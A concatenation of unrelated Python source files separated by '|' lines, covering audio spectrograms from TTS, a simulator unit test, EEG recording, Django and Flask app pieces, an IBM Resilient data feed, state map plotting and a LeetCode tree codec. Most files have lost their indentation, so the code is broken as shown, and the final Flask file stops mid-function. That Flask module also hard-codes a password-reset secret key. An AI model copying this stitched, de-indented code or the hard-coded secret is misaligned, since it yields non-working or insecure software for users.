import threading
import subprocess
import glob
import re
import operator
import pickle
from audio import spec2wav, wav2spec, read_wav, write_wav
import matplotlib.pyplot as plt
import numpy as np
sr = 22050
n_fft = 512
win_length = 400
hop_length = 80
duration = 2 # sec
# moving all data to one dir cd ~/Downloads/aclImdb/test/neg; tar -cf - * | (cd ~/Downloads/aclImdb/data; tar -xf -)
def wav_to_spec_inverted(file):
wav_x = read_wav(file, sr, duration)
spec_x, _ = wav2spec(wav_x, n_fft, win_length, hop_length, False)
spec_x_padding = np.array(spec_x[:, 0:300])
spec_x_padding /= np.max(spec_x_padding)
spec_x_padding.resize((257, 300))
return np.swapaxes( spec_x_padding, 0, 1 )
def save_obj(obj, name ):
with open('data/'+ name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
with open('data/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
def process_files(files, thread_id):
counter = 0
words = {}
for file in files :
with open(file) as f_pointer:
line = " ".join( f_pointer.readlines() )
cleaned_text = line.replace("<br />", " ").replace("/", " ").replace("\"", " ").replace("'", " ").replace("(", " ").replace("`", " ").replace("~", " ").replace("-", " ")
cleaned_text = cleaned_text.replace(")", " ").replace(",", " ").replace("“", " ").replace("‘", " ").replace(".", " ").replace("?", " ").replace("!", " ")
cleaned_text = cleaned_text.replace("$", " ")
cleaned_text = cleaned_text.replace(":", " ").replace(";", " ").replace("_", " ").replace("--", " ").replace("{", " ").replace("}", " ").replace("=", " ")
parts = cleaned_text.split(' ')
for part in parts:
part = part.strip().lower()
use_this = True
l = len(part)
if l == 0 or l > 25: use_this = False
elif part.startswith("http"): use_this = False
elif "*" in part: use_this = False
elif "--" in part: use_this = False
elif "\x97" in part: use_this = False
elif "\x85" in part: use_this = False
if use_this:
if part in words:
words[part] += 1
else:
words[part] = 1
counter += 1
# sorted_words = sorted(words.items(), key=operator.itemgetter(1))
#
# print( sorted_words[-100:])
# print( sorted_words[:200])
data1 = []
data2 = []
counter = 0
words_to_use = []
save_part_index = 0
for word in words:
count = words[word]
if count > 1:
try:
subprocess.check_output(
['say', '--file-format=WAVE', '--channels=1', '--data-format=LEF32@22050', '-o', '/tmp/1.wav', '-v', 'Ava', '-r', '175', word])
subprocess.check_output(
['say', '--file-format=WAVE', '--channels=1', '--data-format=LEF32@22050', '-o', '/tmp/2.wav', '-v', 'Serena', '-r', '175', word])
spec1 = wav_to_spec_inverted('/tmp/1.wav')
spec2 = wav_to_spec_inverted('/tmp/2.wav')
data1.append(spec1)
data2.append(spec2)
words_to_use.append(count)
counter += 1
            except Exception:
                # Skip words that the TTS or spectrogram pipeline cannot handle.
                pass
            if counter % 5000 == 0 and len(data1) > 0:
print("counter " + str(counter))
save_obj(words_to_use, "word_count_" + str(save_part_index))
np.save("data/data1_" + str(save_part_index), np.array(data1))
np.save("data/data2_" + str(save_part_index), np.array(data2))
data1 = []
data2 = []
words_to_use = []
save_part_index += 1
if len(data1) > 0:
save_obj(words_to_use, "word_count_" + str(save_part_index))
np.save("data/data1_" + str(save_part_index), np.array(data1))
np.save("data/data2_" + str(save_part_index), np.array(data2))
print("total words " + str(counter))
if __name__ == "__main__":
num_threads = 1
thread_pointers = [i for i in range(num_threads)]
files = glob.glob("/Users/henry/Downloads/aclImdb/data/*.txt")
print("Processing " + str(len(files)) + " files:")
files_per_part = int( len(files) / num_threads )
for i in range(num_threads):
some_files = files[i * files_per_part : (i+1) * files_per_part]
thread_pointers[i] = threading.Thread(target=process_files, args=(some_files, i))
for i in range(num_threads):
thread_pointers[i].start()
for i in range(num_threads):
thread_pointers[i].join()
print("Done!")
|
import unittest
from decimal import Decimal
from gsf.core.entity.core import Entity
from gsf.core.entity.properties import ExpressionProperty
from gsf.core.mathematics.values import Value
from gsf.dynamic_system.dynamic_systems import DiscreteEventDynamicSystem
from gsf.dynamic_system.future_event_list import Scheduler
from gsf.models.core import Path
from test.module_tests.mocks.dynamic_system_mock import DynamicSystemMock
from test.module_tests.mocks.model_mock import ModelMock
import numpy as np
class DiscreteEventDynamicSystemTest(unittest.TestCase):
"""Base dynamic system tests"""
dynamic_system: DiscreteEventDynamicSystem
def setUp(self) -> None:
"""Sets up tests"""
self.dynamic_system = DynamicSystemMock(Scheduler())
def tearDown(self) -> None:
"""Remove changes of the tests."""
Entity._saved_names = set()
def test_schedule(self):
"""Should schedule a model"""
m = ModelMock(self.dynamic_system)
self.dynamic_system.schedule(m, Decimal(10))
self.assertEqual(10, self.dynamic_system.get_time_of_next_events())
def test_get_next_models(self):
"""Should retrieve the next models"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(11))
self.assertEqual({m1, m2}, self.dynamic_system.get_next_models())
def test_get_output(self):
"""Should retrieve the next models"""
m1 = ModelMock(self.dynamic_system)
self.dynamic_system.schedule(m1, Decimal(10))
m1.get_output = lambda: 5
self.assertDictEqual({m1: 5}, self.dynamic_system.get_output())
def test_get_effective_paths_ones(self):
"""Should get the valid paths for each output"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
m12 = Path(m1, m2, ExpressionProperty(Value(1)))
m13 = Path(m1, m3, ExpressionProperty(Value(1)))
m23 = Path(m2, m3, ExpressionProperty(Value(1)))
self.dynamic_system.link(m12)
self.dynamic_system.link(m13)
self.dynamic_system.link(m23)
m1.get_output = lambda: 5
m2.get_output = lambda: 15
m3.get_output = lambda: 25
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(10))
self.dynamic_system.get_output()
self.assertEqual({m12, m13}, self.dynamic_system._get_effective_paths(m1))
self.assertEqual({m23}, self.dynamic_system._get_effective_paths(m2))
def test_get_effective_paths_probability(self):
"""Should get the valid paths for each output probability"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
m11 = Path(m1, m1, ExpressionProperty(Value(0.1)))
m12 = Path(m1, m2, ExpressionProperty(Value(0.3)))
m13 = Path(m1, m3, ExpressionProperty(Value(0.6)))
m23 = Path(m2, m3, ExpressionProperty(Value(1)))
self.dynamic_system.link(m11)
self.dynamic_system.link(m12)
self.dynamic_system.link(m13)
self.dynamic_system.link(m23)
m1.get_output = lambda: 5
m2.get_output = lambda: 15
m3.get_output = lambda: 25
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(10))
self.dynamic_system.get_output()
self.assertEqual(1, len(self.dynamic_system._get_effective_paths(m1)))
self.assertEqual({m23}, self.dynamic_system._get_effective_paths(m2))
def test_get_affected_models_and_its_inputs(self):
"""Should get the affected models and its inputs"""
m1 = ModelMock(self.dynamic_system)
m2 = ModelMock(self.dynamic_system)
m3 = ModelMock(self.dynamic_system)
m12 = Path(m1, m2, ExpressionProperty(Value(1)))
m13 = Path(m1, m3, ExpressionProperty(Value(1)))
m23 = Path(m2, m3, ExpressionProperty(Value(1)))
np.random.seed(42)
self.dynamic_system.link(m12)
self.dynamic_system.link(m13)
self.dynamic_system.link(m23)
m1.get_output = lambda: 5
m2.get_output = lambda: 15
m3.get_output = lambda: 25
self.dynamic_system.schedule(m1, Decimal(10))
self.dynamic_system.schedule(m2, Decimal(10))
self.dynamic_system.schedule(m3, Decimal(10))
self.dynamic_system.get_output()
(
affected_models,
inputs,
) = self.dynamic_system._get_affected_models_and_its_inputs()
self.assertEqual({m2, m3}, affected_models)
self.assertDictEqual(
{m2: {m1.get_id(): 5}, m3: {m1.get_id(): 5, m2.get_id(): 15}}, inputs
)
if __name__ == "__main__":
unittest.main()
|
import numpy as np
import time
import scipy.io as sio
from ismore import brainamp_channel_lists
from riglib.brainamp.rda import *
fs = 1000
channels = brainamp_channel_lists.emg_eog2_eeg
total_time = 120 # how many secs of data to receive and save
n_samples = 2 * fs * total_time # allocate twice as much space as expected
n_chan = len(channels)
DATA = np.zeros((n_chan, n_samples))
idxs = np.zeros(n_chan, int)
chan_to_row = dict()
for row, chan in enumerate(channels):
chan_to_row[chan] = row
emgdata_obj = EMGData()
emgdata_obj.start()
start_time = time.time()
while (time.time() - start_time) < total_time:
chan, data = emgdata_obj.get()
row = chan_to_row[chan]
idx = idxs[row]
DATA[row, idx] = data['data']
idxs[row] += 1
save_dict = {'data': DATA}
sio.matlab.savemat('brainamp_data.mat', save_dict)
|
from Port import Port
import pytest
test_data = [('test1.txt',25,65),('test2.txt',5,127)]
test_data2 = [('test2.txt',5,62)]
@pytest.mark.parametrize("file_name,preamble_len,result",test_data)
def test_first_number_not_compliant(file_name,preamble_len,result):
port = Port(file_name,preamble_len)
assert port.first_number_not_compliant() == result
@pytest.mark.parametrize("file_name,preamble_len,result",test_data2)
def test_encryption_weakness(file_name,preamble_len,result):
port = Port(file_name,preamble_len)
assert port.encryption_weakness() == result
|
from django.urls import path
from django.contrib.auth.decorators import login_required
from django.views.generic import TemplateView
from . import views
from .views import upload
urlpatterns = [
path('', upload, name='upload'),
path('home/', login_required(views.home), name='home_page'),
path('predict/', login_required(views.prediction), name='prediction'),
]
|
#!/usr/bin/python3
HOST = '0.0.0.0'
PORT = 10000
FLAG_PATH = '/flag'
SOURCE_PATH = '/demo.sol'
CONTRACT_NAME = 'Challenge'
EVENT_NAME = 'GetFlag'
INFURA_PROJECT_ID = ''
|
# -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2010, 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use, line-too-long
"""Feed component implementation."""
import logging
import sys
import traceback
from pydoc import locate
from resilient_circuits import ResilientComponent, handler, ActionMessage
from resilient_lib import str_to_bool, get_file_attachment
from resilient import SimpleHTTPException
from rc_data_feed.lib.type_info import FullTypeInfo, ActionMessageTypeInfo
from rc_data_feed.lib.feed import FeedContext
from rc_data_feed.lib.rest_client_helper import RestClientHelper
LOG = logging.getLogger(__name__)
def _get_inc_id(payload):
if 'incident' in payload:
return payload['incident']['id']
return None
def _is_incident_or_task(parent_types):
return {'incident', 'task'}.intersection(parent_types)
def build_feed_outputs(rest_client_helper, opts, feed_names):
"""
build array of all the classes which of datastores to populate
:param rest_client_helper:
:param opts:
:param feed_names:
:return: array of datastore classes
"""
feed_config_names = [name.strip() for name in feed_names.split(',')]
feed_outputs = list()
for feed_config_name in feed_config_names:
feed_options = opts.get(feed_config_name, {})
class_name = feed_options.get("class")
namespace = 'data_feeder_plugins.{ns}.{ns}.{claz}Destination'.format(ns=class_name.lower(), claz=class_name)
LOG.debug(namespace)
obj = locate(namespace)(rest_client_helper, feed_options)
feed_outputs.append(obj)
return feed_outputs
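# A sketch of how build_feed_outputs resolves plugin classes (the section and
# class names below are hypothetical, for illustration only): a "feeds" section
# lists feed_names, and each named section supplies a "class" value that is
# expanded with the namespace pattern above, e.g.
#
#   [feeds]
#   feed_names=sql_feed, es_feed
#
#   [sql_feed]
#   class=SQLServer      -> data_feeder_plugins.sqlserver.sqlserver.SQLServerDestination
#
#   [es_feed]
#   class=ElasticSearch  -> data_feeder_plugins.elasticsearch.elasticsearch.ElasticSearchDestination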
def range_chunks(chunk_range, chunk_size):
"""
build array of lists to break of queries into smaller chunks
:param chunk_range:
:param chunk_size:
:return:
"""
if isinstance(chunk_range, list):
start = chunk_range[0]-1
stop = chunk_range[-1]
else:
start = chunk_range.start - 1
stop = chunk_range.stop
while start <= stop:
yield (start + 1, min(stop, start + chunk_size))
start += chunk_size
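# A minimal illustration of range_chunks (doctest-style, not executed; note that
# the upper bound is treated as inclusive):
#
#   >>> list(range_chunks([1, 2, 3, 4, 5, 6, 7, 8, 9], 4))
#   [(1, 4), (5, 8), (9, 9)]
#   >>> list(range_chunks(range(1, 10), 4))
#   [(1, 4), (5, 8), (9, 10)]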
def send_data(type_info, inc_id, rest_client_helper, payload,\
feed_outputs, is_deleted, incl_attachment_data):
"""
perform the sync to the different datastores
:param type_info:
:param inc_id:
    :param rest_client_helper:
:param payload:
:param feed_outputs:
:param is_deleted: true/false
:param incl_attachment_data: true/false
:return: None
"""
context = FeedContext(type_info, inc_id, rest_client_helper.inst_rest_client, is_deleted)
type_name = type_info.get_pretty_type_name()
    # make sure the incident has an org_name
if type_name == 'incident':
payload['org_name'] = type_info.get_org_name(payload['org_id'])
# collect attachment data to pass on
elif not is_deleted and incl_attachment_data \
and type_name == 'attachment':
# this will return a byte string
payload['content'] = get_file_attachment(rest_client_helper.inst_rest_client, inc_id,
task_id=payload.get('task_id'),
attachment_id=payload['id'])
elif not is_deleted and incl_attachment_data \
and type_name == 'artifact' \
and payload.get('attachment'):
# this will return a byte string
payload['content'] = get_file_attachment(rest_client_helper.inst_rest_client, inc_id,
artifact_id=payload['id'])
for feed_output in feed_outputs:
# don't let a failure in one feed break all the rest
try:
LOG.debug("Calling feed %s", feed_output.__class__.__name__)
feed_output.send_data(context, payload)
except Exception as err:
LOG.error("Failure in update to %s %s", feed_output.__class__.__name__, err)
error_trace = traceback.format_exc()
LOG.error("Traceback %s", error_trace)
class FeedComponent(ResilientComponent):
"""This component handles initial population of a feed and ongoing
modifications from the associated queue."""
DATATABLE_TYPE_ID = 8
INCIDENT_TYPE_ID = 0
INC_PAGE_SIZE = 500
SEARCH_PAGE_SIZE = 50
"""Component that ingests data"""
def __init__(self, opts):
super(FeedComponent, self).__init__(opts)
try:
self.options = opts.get("feeds", {})
LOG.debug(self.options)
self.channel = "actions." + self.options.get("queue", "feed_data")
if self.options.get("feed_names") is None:
LOG.error("No feed_names are specified")
else:
rest_client_helper = RestClientHelper(self.rest_client)
self.feed_outputs = build_feed_outputs(rest_client_helper, opts, self.options.get("feed_names", None))
# expose attachment content setting
self.incl_attachment_data = str_to_bool(self.options.get("include_attachment_data", 'false'))
# determine the reload options to follow
if str_to_bool(self.options.get('reload', 'false')):
query_api_method = str_to_bool(self.options.get("reload_query_api_method", 'false'))
reload_feeds = Reload(rest_client_helper, self.feed_outputs,
query_api_method=query_api_method,
incl_attachment_data=self.incl_attachment_data)
reload_feeds.reload_all()
except Exception as err:
LOG.error("exception: %s", err)
error_trace = traceback.format_exc()
LOG.error("Traceback %s", error_trace)
@handler()
def _feed_ingest_data(self, event, *args, **kwargs): # pylint: disable=unused-argument
"""Ingests data of any type that can be sent to a Resilient message destination"""
if not isinstance(event, ActionMessage):
# Some event we are not interested in
return
try:
log = logging.getLogger(__name__)
log.info("ingesting object")
rest_client_helper = RestClientHelper(self.rest_client)
type_info = ActionMessageTypeInfo(event.message['object_type'],
event.message['type_info'],
rest_client_helper.inst_rest_client)
type_name = type_info.get_pretty_type_name()
inc_id = _get_inc_id(event.message)
is_deleted = event.message['operation_type'] == 'deleted'
if type_info.is_data_table():
payload = event.message['row']
else:
payload = event.message[type_name]
send_data(type_info, inc_id, rest_client_helper, payload,
self.feed_outputs, is_deleted, self.incl_attachment_data)
except Exception as err:
error_trace = traceback.format_exc()
LOG.error("Traceback %s", error_trace)
LOG.error("Failure on action %s object %s type_info %s",
event.message['operation_type'], event.message['object_type'], event.message['type_info'])
class Reload(object):
def __init__(self, rest_client_helper, feed_outputs,\
query_api_method=False, incl_attachment_data=False):
"""
        :param rest_client_helper: helper wrapping the rest client, since we may need to refresh the client later
:param feed_outputs:
:param query_api_method:
:param incl_attachment_data: true/false
"""
self.rest_client_helper = rest_client_helper
self.feed_outputs = feed_outputs
self.query_api_method = query_api_method
self.incl_attachment_data = incl_attachment_data
self.init_type_info()
self.lookup = {
"attachment": self._query_attachment,
"artifact": self._query_artifact,
"datatable": self._query_datatable,
"milestone": self._query_milestone,
"note": self._query_note,
"task": self._query_task,
"__emailmessage": None
}
def init_type_info(self):
# We want to search all of the types that have incident or task as a parent.
self.type_info_index = {}
self.search_type_names = ['datatable']
for (type_name, type_dto) in list(self.rest_client_helper.get("/types").items()):
parent_types = set(type_dto['parent_types'])
if type_name == 'incident' or _is_incident_or_task(parent_types):
real_id = type_dto['id']
name = type_dto['type_name']
type_id = type_dto['type_id']
info = FullTypeInfo(real_id,
self.rest_client_helper,
refresh=False,
all_fields=list(type_dto['fields'].values()))
# Index by both name and ID.
self.type_info_index[real_id] = info
self.type_info_index[name] = info
if type_id not in [FeedComponent.DATATABLE_TYPE_ID, FeedComponent.INCIDENT_TYPE_ID]:
self.search_type_names.append(name)
def reload_all(self, min_inc_id=0, max_inc_id=sys.maxsize):
"""
load incidents and related notes, tasks, artifacts, etc based on min and max values
:param min_inc_id: defaults to 0 for all incidents
:param max_inc_id: defaults to max number for all incidents
:return: # of incidents sync'd
"""
actual_max_inc_id, actual_min_inc_id = self._populate_incidents(self.type_info_index, min_inc_id, max_inc_id,
self.query_api_method)
if not self.query_api_method:
rng = range(actual_min_inc_id, actual_max_inc_id)
self._populate_others(rng, self.search_type_names, self.type_info_index)
return 0 if actual_max_inc_id == 0 else (actual_max_inc_id - actual_min_inc_id) + 1
def _populate_incidents(self, type_info_index, min_inc_id, max_inc_id, query_api_method):
"""
:param type_info_index:
:param min_inc_id:
:param max_inc_id:
:param query_api_method:
:return:
"""
actual_min_inc_id = sys.maxsize
actual_max_inc_id = 0
try:
for incident in self._page_incidents(min_inc_id, max_inc_id):
inc_id = incident['id']
actual_min_inc_id = min(actual_min_inc_id, inc_id)
actual_max_inc_id = max(actual_max_inc_id, inc_id)
type_info = type_info_index[FeedComponent.INCIDENT_TYPE_ID]
send_data(type_info, inc_id, self.rest_client_helper, incident,
self.feed_outputs, False, self.incl_attachment_data)
# query api call should be done now
if query_api_method:
self._populate_others_query(inc_id,
self.search_type_names,
self.type_info_index)
except StopIteration:
pass
return actual_max_inc_id, actual_min_inc_id
def _populate_others(self,
inc_range,
search_type_names,
type_info_index):
for chunk in range_chunks(inc_range, FeedComponent.SEARCH_PAGE_SIZE):
            # Handle all the other built-in types using the search endpoint
            # (except the incident type, which was already handled above).
            # Make sure we only get data for our org.
self._populate_others_chunk(chunk, search_type_names, type_info_index)
def _populate_others_chunk(self, chunk, search_type_names, type_info_index):
        # Search for all related objects within this chunk of incident ids,
        # restricted to our org.
search_input_dto = {
'query': 'inc_id:[{0} TO {1}]'.format(chunk[0], chunk[1]),
'types': search_type_names,
'org_id': self.rest_client_helper.get_inst_rest_client().org_id
}
search_results = self.rest_client_helper.search(search_input_dto)
for result in search_results['results']:
# We're not consistent about returning IDs vs names of types. The search
# results are returning the type name (even though it's called "type_id").
type_name = result['type_id']
result_data = result['result']
if type_name == 'datatable':
# We need the ID of the table, not the ID for the generic "datatable" type.
type_id = result_data['type_id']
type_info = type_info_index[type_id]
else:
type_info = type_info_index[type_name]
inc_id = result['inc_id']
send_data(type_info, inc_id, self.rest_client_helper, result_data,
self.feed_outputs, False, self.incl_attachment_data)
def _populate_others_query(self,
inc_id,
object_type_names,
type_info_index):
# ensure the incident is found
try:
_incident = self.rest_client_helper.get("/incidents/{}".format(inc_id))
for object_type in object_type_names:
if not self.lookup.get(object_type):
LOG.error("Method for synchronization not found: %s", object_type)
else:
try:
type_info = type_info_index.get(object_type, None) # datatables will not have a type_info object at this time
sync_count = self.lookup[object_type](self.rest_client_helper, inc_id, type_info)
LOG.debug("inc_id: %s %s : %s", inc_id, object_type, sync_count)
except AttributeError:
LOG.error("Query error for synchronization method: %s", object_type)
except SimpleHTTPException:
pass
def _query_artifact(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/artifacts".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper,
item, self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_milestone(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/milestones".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_note(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/comments".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_task(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/tasks".format(inc_id)
item_list = rest_client_helper.get(query)
for item in item_list:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_attachment(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/attachments/query?include_tasks=true".format(inc_id)
item_list = rest_client_helper.post(query, None)
for item in item_list['attachments']:
send_data(type_info, inc_id, rest_client_helper, item,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _query_datatable(self, rest_client_helper, inc_id, type_info):
query = "/incidents/{}/table_data".format(inc_id)
item_list = rest_client_helper.get(query)
for _, table in item_list.items():
# We need the ID of the table, not the ID for the generic "datatable" type.
type_id = table['id']
type_info = self.type_info_index[type_id]
for row in table['rows']:
send_data(type_info, inc_id, rest_client_helper, row,
self.feed_outputs, False, self.incl_attachment_data)
return len(item_list)
def _page_incidents(self, min_inc_id, max_inc_id):
query = {
'start': 0,
'length': FeedComponent.INC_PAGE_SIZE,
'sorts': [
{
'field_name': 'id',
'type': 'asc'
}
]
}
conditions = []
if min_inc_id:
condition = {
"method": "gte",
"field_name": "id",
"value": min_inc_id
}
conditions.append(condition)
if conditions:
query['filters'] = [{
"conditions": conditions
}]
LOG.debug("query filter: %s", query)
url = '/incidents/query_paged?return_level=full'
paged_results = self.rest_client_helper.post(url, query)
while paged_results.get('data'):
data = paged_results.get('data')
for result in data:
if result['id'] <= max_inc_id:
yield result
query['start'] = len(data) + query['start']
paged_results = self.rest_client_helper.post(url, query)
|
#!/usr/bin/env python
# encoding: utf-8
# Copyright (c) 2021 Grant Hadlich
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import geopandas
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
from shapely.geometry import Polygon
import numpy as np
from tqdm.auto import tqdm
state_image_list = {
"Alabama" : "AL.png",
"Alaska" : "AK.png",
"Arizona" : "AZ.png",
"Arkansas" : "AR.png",
"California" : "CA.png",
"Colorado" : "CO.png",
"Connecticut" : "CT.png",
"Delaware" : "DE.png",
"Florida" : "FL.png",
"Georgia" : "GA.png",
"Hawaii" : "HI.png",
"Idaho" : "ID.png",
"Illinois" : "IL.png",
"Indiana" : "IN.png",
"Iowa" : "IA.png",
"Kansas" : "KS.png",
"Kentucky" : "KY.png",
"Louisiana" : "LA.png",
"Maine" : "ME.png",
"Maryland" : "MD.png",
"Massachusetts" : "MA.png",
"Michigan" : "MI.png",
"Minnesota" : "MN.png",
"Mississippi" : "MS.png",
"Missouri" : "MO.png",
"Montana" : "MT.png",
"Nebraska" : "NE.png",
"Nevada" : "NV.png",
"New Hampshire" : "NH.png",
"New Jersey" : "NJ.png",
"New Mexico" : "NM.png",
"New York" : "NY.png",
"North Carolina" : "NC.png",
"North Dakota" : "ND.png",
"Ohio" : "OH.png",
"Oklahoma" : "OK.png",
"Oregon" : "OR.png",
"Pennsylvania" : "PA.png",
"Rhode Island" : "RI.png",
"South Carolina" : "SC.png",
"South Dakota" : "SD.png",
"Tennessee" : "TN.png",
"Texas" : "TX.png",
"Utah" : "UT.png",
"Vermont" : "VT.png",
"Virginia" : "VA.png",
"Washington" : "WA.png",
"West Virginia" : "WV.png",
"Wisconsin" : "WI.png",
"Wyoming" : "WY.png",
"District of Columbia" : "DC.png",
}
if __name__ == "__main__":
# Construct Output File
directory = "./state_images"
for state in tqdm(state_image_list, total=len(state_image_list), position=0, leave=True):
output_file = os.path.join(directory, state_image_list[state])
""" Takes in a map by state name with some decimal percentage as the value to plot on US Map """
states = geopandas.read_file("./data/cb_2018_us_state/cb_2018_us_state_500k.shp")
# Get States
m = states['NAME'] == state
# Create polygon that is the area of interest
if state == "Hawaii":
target_poly = Polygon([(-162, 23), (-162, 15),
(-154, 15), (-154, 23)])
else:
target_poly = Polygon([(-179.9, 18), (-179.9, 89),
(-65, 89), (-65, 18)])
# Collect States for Plot
conus = states[m]
# Clip the Map
conus_clipped = conus.copy()
conus_clipped['geometry'] = conus.intersection(target_poly)
conus = conus_clipped[conus_clipped['geometry'] != Polygon()]
# Create Initial Plot
us_map = conus.plot(figsize=(15, 8))
#us_map = conus.plot()
# Create and Save the Plot
us_map.axis('off')
fig = us_map.get_figure()
fig.tight_layout()
fig.savefig(output_file)
# Create Conus
output_file = os.path.join(directory, "US.png")
""" Takes in a map by state name with some decimal percentage as the value to plot on US Map """
states = geopandas.read_file("./data/cb_2018_us_state/cb_2018_us_state_500k.shp")
# Shift Alaska
m = states['NAME'] == 'Alaska'
states[m] = states[m].set_geometry(states[m].translate(-75, -39).scale(.3,.5))
# Shift Hawaii
m = states['NAME'] == 'Hawaii'
states[m] = states[m].set_geometry(states[m].translate(44,5).scale(1.7,1.7))
# Shift DC
m = states['NAME'] == 'District of Columbia'
states[m] = states[m].set_geometry(states[m].translate(5,-3).scale(16,16))
# Collect States for Plot
conus = states[~states['STUSPS'].isin(['PR', "AS", "VI", "MP", "GU"])]
# Create polygon that is the area of interest
target_poly = Polygon([(-125, 18), (-125, 52),
(-65, 52), (-65, 18)])
# Clip the Map
conus_clipped = conus.copy()
conus_clipped['geometry'] = conus.intersection(target_poly)
conus = conus_clipped[conus_clipped['geometry'] != Polygon()]
# Create Initial Plot
us_map = conus.plot(figsize=(15, 8))
# Create and Save the Plot
us_map.axis('off')
fig = us_map.get_figure()
fig.tight_layout()
fig.savefig(output_file)
|
from datetime import tzinfo, timedelta, datetime
from django.core.management.base import BaseCommand, CommandError
from orders.models import subscription_product
from invoice.models import Invoice
#python manage.py checksubscription 2016-11-10
class Command(BaseCommand):
help = 'Check for expiry of subscriptions'
def add_arguments(self, parser):
parser.add_argument('run_date', nargs='+', type=str)
def handle(self, *args, **options):
for run_date in options['run_date']:
self.stdout.write(self.style.SUCCESS('Date: "%s"' % datetime.strptime(run_date, "%Y-%m-%d")))
scn_products = subscription_product.objects.filter(expiration_date__lte = datetime.strptime(run_date, "%Y-%m-%d"))
for scn_item in scn_products:
now = datetime.now()
inv_num = now.strftime("%d%m%Y%S%M%H%f")
inv = Invoice(invoice_number = inv_num, title = scn_item.title, due_date = scn_item.expiration_date, customer = scn_item.customer, subscription = scn_item, description = scn_item.title, status = True)
inv.save()
self.stdout.write(self.style.SUCCESS('Invoice: "%s"' % inv_num))
self.stdout.write(self.style.SUCCESS('Subscription: "%s"' % scn_item.title))
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
"""
timecomplexity= O(n) spacecomplexity = O(n)
serialize
construct recusive function to covert tree into string replace None by '# ' and use ' ' to separate each node
deserialize
At first, define a list which element is from the string split ' ', then check special tase if len is 0 or only '#' in the List
construct recusive function to get tree node from the List by pop the [0] from it.
"""
class Codec:
def serialize(self, root):
"""Encodes a tree to a single string.
:type root: TreeNode
:rtype: str
"""
def rserialize(root,string):
if root == None:
string += '# '
else:
string += str(root.val) + ' '
string = rserialize(root.left,string)
string = rserialize(root.right, string)
return string
string = rserialize(root, '')
return string
def deserialize(self, data):
"""Decodes your encoded data to tree.
:type data: str
:rtype: TreeNode
"""
def rdeserialize(l):
if len(l) == 0:
return
if l[0] == '#':
l.pop(0)
return None
root = TreeNode(l[0])
l.pop(0)
root.left = rdeserialize(l)
root.right = rdeserialize(l)
return root
data_list = data.split(' ')
return rdeserialize(data_list)
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.deserialize(codec.serialize(root))
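# A minimal round-trip sketch (illustrative only; on LeetCode the TreeNode class
# commented out above is provided by the judge, here it is defined locally):
if __name__ == "__main__":
    class TreeNode(object):
        def __init__(self, x):
            self.val = x
            self.left = None
            self.right = None
    root = TreeNode(1)
    root.left = TreeNode(2)
    root.right = TreeNode(3)
    codec = Codec()
    encoded = codec.serialize(root)
    print(encoded)                                  # "1 2 # # 3 # # "
    print(codec.deserialize(encoded) is not None)   # True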
|
""" Module related to forgot password"""
from flask import Blueprint, flash, url_for, render_template
from itsdangerous import URLSafeTimedSerializer
from werkzeug.security import generate_password_hash
from werkzeug.utils import redirect
from auth.forms import ForgotForm, ResetForm
from auth.helpers import find_user_active, send_forgot_email, find_user, update_user
forgot_bp = Blueprint("forgot", __name__, url_prefix="/forgot") # pylint: disable=invalid-name
secret_key = "kasia" # TODO fix this
@forgot_bp.route("/", methods=["GET", "POST"])
def forgot():
"""Send email to reset password
:return: redirect to home or reset_password
"""
form = ForgotForm()
if form.validate_on_submit():
